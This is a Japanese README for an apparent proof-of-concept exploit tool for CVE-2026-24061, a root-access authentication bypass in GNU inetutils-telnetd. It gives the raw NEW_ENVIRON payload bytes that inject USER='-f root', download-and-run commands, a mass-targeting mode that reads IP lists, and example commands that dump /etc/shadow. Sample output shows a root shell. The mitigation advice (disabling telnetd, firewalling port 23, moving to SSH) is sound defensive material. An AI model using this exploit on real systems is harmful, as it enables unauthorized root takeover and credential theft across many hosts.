
概念実証: CVE-2026-24061 は、GNU inetutils-telnetd における重大な認証バイパスの脆弱性であり、認証されていないリモート攻撃者が悪意のある NEW_ENVIRON telnet オプションを悪用することで、即座にルートシェルアクセスを取得できるようになります。
CVE-2026-24061 を悪用するためのセキュリティリサーチツールです。これは GNU inetutils-telnetd の重大なリモート認証バイパス脆弱性であり、認証なしで即座に root シェルアクセスを可能にします。
| 項目 | 値 |
|---|---|
| CVE 識別子 | CVE-2026-24061 |
| CVSS v3.1 スコア | 9.8(緊急) |
| CVSS ベクター | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE 分類 | CWE-88: コマンドにおける引数デリミタの不適切な無害化 |
| ベンダー | GNU Project |
| 製品 | inetutils-telnetd |
| 公開日 | 2026年1月20日 |
| パッチ提供状況 | 未定 |
GNU inetutils-telnetd バージョン 2.7 以前に、認証されていないリモート攻撃者が認証を完全にバイパスして即座に root シェルアクセスを取得できる重大な脆弱性が存在します。この脆弱性は、NEW_ENVIRON telnet オプションを介して、特別に細工された値 "-f root" を持つ USER 環境変数を注入することで悪用され、すべての認証メカニズムをバイパスします。
| バージョン範囲 | ステータス |
|---|---|
| <= 2.7 | 脆弱 |
| > 2.7 | パッチ状況未定 |
この脆弱性は、telnetd の NEW_ENVIRON オプションハンドラにおける USER 環境変数の不適切な検証に起因します。NEW_ENVIRON telnet オプションを処理する際、telnetd サービスは USER 変数の値を login プロセスに渡す前にサニタイズしません。攻撃者が USER を "-f root" に設定することで、資格情報を必要とせずに root ユーザーの認証を強制的に成功させるコマンドライン引数を注入します。
すべての依存関係は Python の標準ライブラリに含まれています:
| パッケージ | 用途 |
|---|---|
| socket | ネットワーク通信 |
| select | I/O 多重化 |
| sys | システム連携 |
| os | オペレーティングシステムインターフェース |
| threading | 並行ターゲット悪用 |
| datetime | タイムスタンプのフォーマット |
# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061
# Run the exploit
python3 main.py -u <target_ip>
# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py
# Make it executable (Linux/macOS)
chmod +x main.py
# Run the exploit
python3 main.py -u <target_ip>
# Ensure Python 3.7+ is installed
python3 --version
# Download and run
python3 main.py -u <target_ip>
Usage:
python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
echo "commands" | python3 main.py -u <target_ip>
Arguments:
-u Single target IP address or hostname
-l Path to file containing target IPs (one per line)
-p Target port (default: 23)
-usr User to exploit as (default: root)
単一の telnetd インスタンスを悪用します:
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100
# Custom port
python3 main.py -u 192.168.1.100 -p 2323
# Different user
python3 main.py -u 192.168.1.100 -usr admin
コマンドを非対話的に実行します:
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100
# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100
# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100
ファイルから複数のターゲットを一括で悪用します:
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin
ターゲットファイル形式 (targets.txt):
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com
注記:
| インジケーター | 色 | 説明 |
|---|---|---|
[SUCCESS] | 緑 | ターゲットへの接続に成功 |
[EXPLOIT] | 緑 | 悪用ペイロードの送信に成功 |
[INFO] | 青 | 現在の操作に関する情報メッセージ |
[ERROR] | 赤 | 接続失敗、タイムアウト、または悪用エラー |
[WARNING] | 黄 | 警告メッセージ(現在は未使用) |
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass ║
║ ║
║ CVSS Score: 9.8 (Critical) ║
║ Impact: Remote Authentication Bypass - Instant Root Shell ║
║ ║
║ This tool is part of the HGrab Framework. ║
╚═══════════════════════════════════════════════════════════════╝
[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
このエクスプロイトは telnet プロトコルの交渉フェーズを活用します:
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39
payload = bytes([
255, # IAC
250, # SB
39, # NEW_ENVIRON
0, # IS
0, # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
255, # IAC
240 # SE
])
select.select() を使用しますtelnetd の無効化: telnetd サービスを直ちに停止して無効化します
# systemd-based systems
sudo systemctl stop telnetd
sudo systemctl disable telnetd
# xinetd-based systems
sudo service xinetd stop
sudo chkconfig telnet off
ファイアウォールルール: ファイアウォールレベルで telnet ポート(23)をブロックします
# iptables
sudo iptables -A INPUT -p tcp --dport 23 -j DROP
# firewalld
sudo firewall-cmd --permanent --remove-service=telnet
sudo firewall-cmd --reload
ネットワーク分離: インターネットに公開されたシステムから telnet サービスを削除します
| 対策 | 優先度 | 説明 |
|---|---|---|
| SSH への移行 | 緊急 | リモートアクセス用に telnet を SSH に置き換える |
| パッチ管理 | 緊急 | セキュリティ更新を監視して適用する |
| サービス監査 | 高 | 不要なネットワークサービスを特定して無効化する |
| ネットワークセグメンテーション | 高 | 重要なシステムを公開ネットワークから分離する |
| 侵入検知 | 中 | 悪用の試行を検出するために IDS/IPS を導入する |
| アクセス制御 | 中 | リモートサービスに IP ホワイトリストを実装する |
telnet の代わりに SSH を使用:
# Install OpenSSH server
sudo apt-get install openssh-server # Debian/Ubuntu
sudo yum install openssh-server # RHEL/CentOS
# Enable and start SSH
sudo systemctl enable sshd
sudo systemctl start sshd
# Verify telnetd is not running
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23
# Should return no results if properly disabled
システムログで以下のパターンを確認してください:
認証ログ: